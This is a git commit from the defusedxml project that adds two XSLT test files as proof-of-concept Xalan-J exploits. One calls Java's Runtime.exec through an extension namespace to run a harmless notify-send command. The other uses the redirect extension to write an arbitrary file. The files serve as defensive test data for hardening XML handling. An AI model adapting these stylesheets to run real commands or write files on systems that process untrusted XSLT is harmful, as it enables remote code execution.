diff options
author | Christian Heimes <christian@python.org> | 2013-03-07 22:03:36 +0100 |
---|---|---|
committer | Christian Heimes <christian@python.org> | 2013-03-07 22:03:36 +0100 |
commit | 4ad1716a750cda8c78a9e06a21e870cb26f2f4c9 (patch) | |
tree | 48e6fc95b61ef2feaed897abcd25826fb0d7e33e /xmltestdata | |
parent | e58f866ad29fb4d95d21e0e8b04f775ca25a1f7a (diff) | |
download | defusedxml-git-4ad1716a750cda8c78a9e06a21e870cb26f2f4c9.tar.gz |
add two working xalan exploits
Diffstat (limited to 'xmltestdata')
-rw-r--r-- | xmltestdata/xalan_exec.xsl | 20 | ||||
-rw-r--r-- | xmltestdata/xalan_write.xsl | 18 |
2 files changed, 38 insertions, 0 deletions
diff --git a/xmltestdata/xalan_exec.xsl b/xmltestdata/xalan_exec.xsl new file mode 100644 index 0000000..b06c59a --- /dev/null +++ b/xmltestdata/xalan_exec.xsl @@ -0,0 +1,20 @@ +<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on + OpenJDK 1.7.0_15 + + $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \ + org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl +--> +<xsl:stylesheet version="1.0" + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" + xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" + xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" + exclude-result-prefixes="rt ob"> + <xsl:template match="/"> + <xsl:variable name="runtimeObject" select="rt:getRuntime()"/> + <xsl:variable name="command" + select="rt:exec($runtimeObject, '/usr/bin/notify-send SomethingBadHappensHere')"/> + <xsl:variable name="commandAsString" select="ob:toString($command)"/> + <xsl:value-of select="$commandAsString"/> + </xsl:template> +</xsl:stylesheet> + diff --git a/xmltestdata/xalan_write.xsl b/xmltestdata/xalan_write.xsl new file mode 100644 index 0000000..56d35b9 --- /dev/null +++ b/xmltestdata/xalan_write.xsl @@ -0,0 +1,18 @@ +<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on + OpenJDK 1.7.0_15 + + $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \ + org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl +--> +<xsl:stylesheet version="1.0" + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" + xmlns:redirect="http://xml.apache.org/xalan/redirect" + extension-element-prefixes="redirect"> + <xsl:output omit-xml-declaration="yes" indent="yes"/> + <xsl:template match="/"> + <redirect:write file="xalan_redirect.txt" method="text"> + <xsl:text>Something bad happens here! </xsl:text> + </redirect:write> + </xsl:template> +</xsl:stylesheet> + |